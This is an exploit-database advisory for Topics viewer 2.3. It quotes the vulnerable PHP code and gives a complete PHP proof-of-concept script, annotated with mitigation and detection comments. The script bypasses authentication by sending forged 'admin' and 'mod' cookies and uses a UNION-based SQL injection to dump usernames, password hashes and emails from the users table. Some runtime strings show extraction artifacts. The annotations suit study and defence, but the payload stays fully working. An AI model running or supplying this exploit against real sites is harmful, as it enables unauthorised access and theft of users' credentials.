Topics viewer <= 2.3 Authentication Bypass & SQL Injection

2012-07-01T00:00:00
ID 1337DAY-ID-18891
Type zdt
Reporter ahwak2000
Modified 2012-07-01T00:00:00

Description

Exploit for the PHP platform, in the category web applications

                                        
+-------------------------------------------------------------+
| Topics viewer <= 2.3 Authentication Bypass & SQL Injection  |
+-------------------------------------------------------------+
 
author.............: ahwak2000
mail...............: z.u5[at]hotmail[dot]com
software link......: http://nilehoster.com/default/topicsviewer
tested versions....: 2.3
date...............: 30/06/2012
---------------------------------------------------------------
Vulnerable code, in file /modcp/rmv_topic_pop.php:
 
Line 16.			if (isset($_SESSION['admin']) || isset($_COOKIE['admin']) || isset($_SESSION['mod']) || isset($_COOKIE['mod']))
				{			
.
.
.
Line 38. 		if(isset ($_GET['id']))

				{
					if (!empty ($_GET['id']))
						{
						$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;"; //<---
						$result = @mysql_query ($sql);
						$topic = @mysql_fetch_array ($result);
						$verify = @mysql_num_rows ($result);
				
Exploit (proof of concept, PHP CLI):
<?
// Proof-of-concept as published in the advisory above, annotated for defenders.
// What the script does, as visible in the code below:
//   1. Sends one GET to <host>/modcp/rmv_topic_pop.php with a UNION-based payload
//      in the `id` query parameter. The advisory's excerpt of that file (its
//      "Line 38") shows $_GET[id] interpolated straight into the SQL string with
//      no integer cast and no parameter binding.
//   2. Sends cookies named `admin` and `mod`. The excerpt's "Line 16" only tests
//      isset() on those cookies, so their presence alone passes the access check;
//      that is the authentication bypass.
//   3. Treats the presence of "style.css" in the response as "page rendered",
//      then extracts the UNION result from an <li> element with a regex.
// Mitigation for the application: derive authorisation from server-side session
// state only (never from whether a cookie exists), and bind `id` as an integer
// (prepared statement or an (int) cast) instead of string interpolation.
// Detection: requests to modcp/rmv_topic_pop.php whose `id` is non-numeric or
// carries MySQL inline-comment tokens such as /*!union*/ or /*!SELeCT*/, and
// `admin`/`mod` cookies with values the application never issued.
print_r("
------------------------------------------------------------------
 _______          _           __      ___                        
|__   __|        (_)          \ \    / (_)                       
   | | ___  _ __  _  ___ ___   \ \  / / _  _____      _____ _ __ 
   | |/ _ \| '_ \| |/ __/ __|   \ \/ / | |/ _ \ \ /\ / / _ \ '__|
   | | (_) | |_) | | (__\__ \    \  /  | |  __/\ V  V /  __/ |   
   |_|\___/| .__/|_|\___|___/     \/   |_|\___| \_/\_/ \___|_|V2.3   
           | |                                                   
           |_| BY AHWAK2000
------------------------------------------------------------------
		   ");
// Usage banner when no target argument was supplied.
if ($argc<2) {
print_r('
-----------------------------------------------------------------------------
                Usage: php '.$argv[0].' site.com/path/
-----------------------------------------------------------------------------
');

}
if ($argc > 1) {
// $argv[1] is concatenated into the URL unchanged (no scheme handling, no validation).
$host=$argv[1];
$ch = curl_init();
// The `id` value is the injection: a negative id so the original row is empty,
// then a UNION SELECT whose second column carries group_concat(u_name:u_mpass:u_email)
// from `users`; the remaining numeric columns pad the select to the expected width.
// The /*!...*/ wrappers are MySQL version-comment syntax (executed by MySQL,
// commented out elsewhere) -- a useful signature for request logs and WAF rules.
curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email),3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");
// Arbitrary cookie values; only their existence is checked by the vulnerable page
// (advisory "Line 16"), so no real session is needed.
curl_setopt($ch, CURLOPT_COOKIE, "admin=ahwak2000;mod=ahwak2000;");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($ch);
// Truthiness test on strpos(): a match at byte offset 0 would be treated as "not found".
if(strpos($buffer,"style.css")){
echo "\n\t[-]---------------------------------------------[-]\n";
// Captures the text after the last ':' inside an <li> up to the '¿' marker.
// NOTE(review): the '¿' here and the '[email protected]' literal below look like
// mis-encoding / mail-obfuscation artifacts of the page extraction; both are
// runtime strings and are left exactly as published.
$reg  = '#<li .*>.*:(.*?)¿</span></li>#Us';
preg_match($reg,$buffer,$ahwak);
// group_concat() output is comma-separated: one entry per user row.
$s1=explode(",",$ahwak[1]);
$i=1;
foreach($s1 as $ayrik){
print "\n\t[$i] ".trim($ayrik)."\n";
$i++;
}
 echo "\n\t[-]---------------------------------------------[-]\n\t\t\[email protected]";
}
 
 }
?>


